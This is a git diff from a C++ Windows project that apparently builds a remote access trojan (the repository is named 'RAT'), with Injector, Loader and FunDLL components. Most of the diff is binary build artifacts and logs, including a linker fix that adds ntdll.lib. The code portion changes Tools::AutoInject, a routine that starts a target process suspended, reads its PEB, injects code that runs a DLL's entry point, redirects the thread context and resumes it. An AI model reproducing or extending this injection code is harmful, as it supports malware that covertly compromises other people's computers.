diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj new file mode 100644 index 0000000..d30e36e Binary files /dev/null and b/Debug/FunDLL.iobj differ diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb new file mode 100644 index 0000000..1e662ac Binary files /dev/null and b/Debug/FunDLL.ipdb differ diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb new file mode 100644 index 0000000..7c917d7 Binary files /dev/null and b/Debug/FunDLL.pdb differ diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb index 5f5e757..49dfc3a 100644 Binary files a/Debug/Injector.pdb and b/Debug/Injector.pdb differ diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb index 5191b40..e219a04 100644 Binary files a/Debug/Loader.pdb and b/Debug/Loader.pdb differ diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log index 9b42e74..29b5d4d 100644 --- a/Dll/Debug/Dll.log +++ b/Dll/Debug/Dll.log @@ -1,5 +1,10 @@ C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior. + fundll.cpp + tools.cpp Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp -tools.obj : error LNK2001: unresolved external symbol _NtQueryInformationProcess@20 -C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll : fatal error LNK1120: 1 unresolved externals + Generating code +c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value + All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. + Finished generating code + Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll diff --git a/Dll/Debug/FunDLL.Build.CppClean.log b/Dll/Debug/FunDLL.Build.CppClean.log index a1a62d7..0e53a99 100644 --- a/Dll/Debug/FunDLL.Build.CppClean.log +++ b/Dll/Debug/FunDLL.Build.CppClean.log @@ -1,4 +1,5 @@ c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb +c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj c:\users\hellisabove\source\repos\rat\debug\fundll.lib c:\users\hellisabove\source\repos\rat\debug\fundll.exp diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog index 9059f15..34a3dbc 100644 Binary files a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog index 4e617ff..6bbc5cf 100644 Binary files a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog index bc1eb33..e7ddf59 100644 Binary files a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog new file mode 100644 index 0000000..b4bb458 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/link.command.1.tlog b/Dll/Debug/FunDLL.tlog/link.command.1.tlog index 46b134b..694b08a 100644 Binary files a/Dll/Debug/FunDLL.tlog/link.command.1.tlog and b/Dll/Debug/FunDLL.tlog/link.command.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/link.read.1.tlog b/Dll/Debug/FunDLL.tlog/link.read.1.tlog index 46b134b..bec3985 100644 Binary files a/Dll/Debug/FunDLL.tlog/link.read.1.tlog and b/Dll/Debug/FunDLL.tlog/link.read.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/link.write.1.tlog b/Dll/Debug/FunDLL.tlog/link.write.1.tlog index 46b134b..cfcbc5e 100644 Binary files a/Dll/Debug/FunDLL.tlog/link.write.1.tlog and b/Dll/Debug/FunDLL.tlog/link.write.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/unsuccessfulbuild b/Dll/Debug/FunDLL.tlog/unsuccessfulbuild deleted file mode 100644 index e69de29..0000000 diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb index 447dc9b..53ebfb9 100644 Binary files a/Dll/Debug/vc141.pdb and b/Dll/Debug/vc141.pdb differ diff --git a/Dll/Dll.vcxproj b/Dll/Dll.vcxproj index 4b50303..2ca1755 100644 --- a/Dll/Dll.vcxproj +++ b/Dll/Dll.vcxproj @@ -92,6 +92,7 @@ Windows true + C:\WinDDK\7600.16385.1\lib\wxp\i386\ntdll.lib;%(AdditionalDependencies) diff --git a/Dll/tools.cpp b/Dll/tools.cpp index c6ad22a..1792322 100644 --- a/Dll/tools.cpp +++ b/Dll/tools.cpp @@ -27,16 +27,16 @@ DWORD ConvertVirtualAddressToRawAddress(DWORD virtual_address, LPVOID file) { int Tools::AutoInject(LPSTR target, LPCSTR payload) { LPSTARTUPINFOA startup_info = new STARTUPINFOA(); - LPPROCESS_INFORMATION process_info = new PROCESS_INFORMATION(); - PROCESS_BASIC_INFORMATION *process_basic_info = new PROCESS_BASIC_INFORMATION(); + LPPROCESS_INFORMATION process_information = new PROCESS_INFORMATION(); + PROCESS_BASIC_INFORMATION *process_basic_information = new PROCESS_BASIC_INFORMATION(); - BOOL process_created = CreateProcessA(NULL, target, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, startup_info, process_info); + BOOL process_created = CreateProcessA(NULL, target, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, startup_info, process_information); if (process_created == TRUE) { - HANDLE target_process = process_info->hProcess; + HANDLE target_process = process_information->hProcess; if (target_process != INVALID_HANDLE_VALUE) { DWORD return_lenght = 0; - NtQueryInformationProcess(target_process, ProcessBasicInformation, process_basic_info, sizeof(PROCESS_BASIC_INFORMATION), &return_lenght); - DWORD image_base_offset = (DWORD)process_basic_info->PebBaseAddress + 8; + NtQueryInformationProcess(target_process, ProcessBasicInformation, process_basic_information, sizeof(PROCESS_BASIC_INFORMATION), &return_lenght); + DWORD image_base_offset = (DWORD)process_basic_information->PebBaseAddress + 8; LPVOID destination_image_base = 0; SIZE_T bytes_read = NULL; @@ -122,7 +122,7 @@ int Tools::AutoInject(LPSTR target, LPCSTR payload) { LPCONTEXT context = new CONTEXT(); context->ContextFlags = CONTEXT_INTEGER; - GetThreadContext(process_info->hThread, context); + GetThreadContext(process_information->hThread, context); // machine code -> opcodes // code for exec DllMain when injected @@ -146,8 +146,8 @@ int Tools::AutoInject(LPSTR target, LPCSTR payload) { if (success == TRUE) { context->Eax = (DWORD)address_buffer; - SetThreadContext(process_info->hThread, context); - ResumeThread(process_info->hThread); + SetThreadContext(process_information->hThread, context); + ResumeThread(process_information->hThread); } return 0; } diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk index a761978..fd7f644 100644 Binary files a/Injector/Debug/Injector.ilk and b/Injector/Debug/Injector.ilk differ diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb index d67335b..7bf1f48 100644 Binary files a/Injector/Debug/vc143.idb and b/Injector/Debug/vc143.idb differ diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb index 6c5c365..444af5d 100644 Binary files a/Injector/Debug/vc143.pdb and b/Injector/Debug/vc143.pdb differ diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog index 4a1d873..f03f114 100644 Binary files a/Loader/Debug/Loader.tlog/link.read.1.tlog and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb index d45b5fc..0898a27 100644 Binary files a/Loader/Debug/vc141.pdb and b/Loader/Debug/vc141.pdb differ